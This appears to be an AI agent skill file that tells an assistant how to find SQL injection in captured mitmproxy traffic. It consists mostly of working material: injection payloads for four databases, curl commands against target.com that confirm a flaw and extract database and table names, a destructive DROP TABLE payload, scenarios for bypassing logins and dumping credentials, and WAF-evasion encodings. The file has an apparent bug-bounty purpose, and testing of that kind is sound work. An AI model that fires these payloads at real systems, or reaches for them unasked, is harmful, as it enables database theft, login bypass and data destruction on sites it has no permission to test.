mitm-find-sqli

name: mitm-find-sqli description: Find SQL Injection vulnerabilities in captured traffic. Use when user asks about database security, injection attacks, or data extraction.

Find SQL Injection Vulnerabilities

Analyze the mitmproxy dump (log.txt) for SQL injection vulnerabilities for: $ARGUMENTS

Requires: log.txt in the current directory. If it's missing, capture traffic first:

mitmdump --set flow_detail=3 2>&1 | tee log.txt

High-Value SQLi Patterns (from 99 real HackerOne bounty reports)

1. Common Vulnerable Parameters

Parameters frequently vulnerable to SQLi:

id, user_id, product_id, order_id, item_id
search, query, q, keyword, term, filter
sort, order, orderby, sortby, column
category, cat, type, status, name
from, to, start, end, date, time
page, limit, offset, per_page
callback, jsonp, format
file, path, template, view

Search patterns:

grep -iE '(id|search|query|sort|order|filter|category|name|type)[=:]["'\'']?[^&"'\'']+' log.txt

2. Injection Points

URL Path Parameters

/api/users/123 → /api/users/123'
/products/category/electronics → /products/category/electronics'--

Query Parameters

?id=1 → ?id=1' OR '1'='1
?search=test → ?search=test' UNION SELECT--
?sort=name → ?sort=name;DROP TABLE--

Request Body (JSON)

{"user_id": "1"} → {"user_id": "1' OR '1'='1"}
{"filter": {"name": "test"}} → {"filter": {"name": "test' OR '1'='1"}}

Headers

X-Forwarded-For: 127.0.0.1' OR '1'='1
Cookie: session=abc' UNION SELECT--

3. Database-Specific Payloads

MySQL

' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
' AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--

PostgreSQL

' OR '1'='1
'; SELECT pg_sleep(5)--
' UNION SELECT NULL,NULL,NULL--

MSSQL

' OR '1'='1
'; WAITFOR DELAY '0:0:5'--
' UNION SELECT NULL,NULL,NULL--

Oracle

' OR '1'='1
' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' UNION SELECT NULL,NULL FROM DUAL--

Detection Techniques

Error-Based Detection

Look for database errors in responses:

grep -iE '(sql|mysql|oracle|postgres|sqlite|syntax error|query|database|ORA-|PG::|Microsoft SQL)' log.txt

Time-Based Detection

Test with sleep payloads, measure response time:

# Baseline
time curl 'https://target.com/api/user?id=1'

# Test
time curl 'https://target.com/api/user?id=1%27%20AND%20SLEEP(5)--'

Boolean-Based Detection

Compare responses:

# True condition
curl 'https://target.com/api/user?id=1%20AND%201=1'

# False condition
curl 'https://target.com/api/user?id=1%20AND%201=2'

# Different response = potentially vulnerable

Union-Based Detection

# Find column count
curl 'https://target.com/api/search?q=test%27%20UNION%20SELECT%20NULL--'
curl 'https://target.com/api/search?q=test%27%20UNION%20SELECT%20NULL,NULL--'
curl 'https://target.com/api/search?q=test%27%20UNION%20SELECT%20NULL,NULL,NULL--'

Severity Rating

Testing Methodology

Step 1: Identify Input Points

# Find all parameters in traffic
grep -oE '[?&][a-zA-Z_]+=' log.txt | sort -u

# Find JSON body parameters
grep -oE '"[a-zA-Z_]+":' log.txt | sort -u

Step 2: Test Basic Payloads

# Single quote test
curl 'https://target.com/api/item?id=1%27'

# Comment test
curl 'https://target.com/api/item?id=1--'

# Boolean test
curl 'https://target.com/api/item?id=1%20AND%201=1'

Step 3: Identify Database Type

# MySQL
curl 'https://target.com/api/item?id=1%27%20AND%20@@version--'

# PostgreSQL
curl 'https://target.com/api/item?id=1%27%20AND%20version()--'

# MSSQL
curl 'https://target.com/api/item?id=1%27%20AND%20@@SERVERNAME--'

Step 4: Extract Data (if vulnerable)

# Get database name
curl 'https://target.com/api/search?q=%27%20UNION%20SELECT%20database(),NULL,NULL--'

# Get table names
curl 'https://target.com/api/search?q=%27%20UNION%20SELECT%20table_name,NULL,NULL%20FROM%20information_schema.tables--'

Real Attack Scenarios

Scenario 1: Authentication Bypass

Login form: username=admin&password=xxx
Payload: username=admin'--&password=anything
Query becomes: SELECT * FROM users WHERE username='admin'--' AND password='anything'
Result: Logs in as admin without password

Scenario 2: Data Extraction via UNION

Search: /api/search?q=test
Payload: /api/search?q=test' UNION SELECT username,password,email FROM users--
Query becomes: SELECT name,desc,price FROM products WHERE name='test' UNION SELECT username,password,email FROM users--
Result: Dumps user credentials

Scenario 3: Blind SQLi Data Extraction

/api/user?id=1' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
Response time or content difference reveals if first char is 'a'
Repeat for each character position

WAF Bypass Techniques

Encoding

' → %27 → %2527 (double encode)
UNION → UnIoN (case variation)
SELECT → /*!SELECT*/ (MySQL comment)

Alternative Syntax

AND → &&
OR → ||
UNION SELECT → UNION ALL SELECT
' → "

Comment Injection

/**/UNION/**/SELECT/**/
UN/**/ION/**/SE/**/LECT

Output Format

## SQLi Finding: [Brief Description]

**Endpoint**: `METHOD https://target.com/path`
**Parameter**: `param_name` in [query|body|path|header]
**Database**: [MySQL|PostgreSQL|MSSQL|Oracle|Unknown]
**Type**: [Error-based|Union|Blind Boolean|Blind Time]
**Severity**: [CRITICAL|HIGH|MEDIUM|LOW]

**Evidence**:
[Request with payload and response showing vulnerability]

**Payload Used**:
' OR '1'='1

**Impact**:
- Database dump possible
- Authentication bypass
- Data modification/deletion

**Test Command**:
curl 'https://target.com/api/...?id=1%27%20OR%20%271%27=%271'

**Remediation**:
- Use parameterized queries / prepared statements
- Input validation and sanitization
- Least privilege database accounts
- WAF rules for SQLi patterns

False Positives to Ignore

• Parameters that are client-side only
• Errors that don't reveal database info
• Rate-limited endpoints that block testing
• Parameters that only accept specific formats (UUID, numeric)
• GraphQL endpoints (different injection patterns)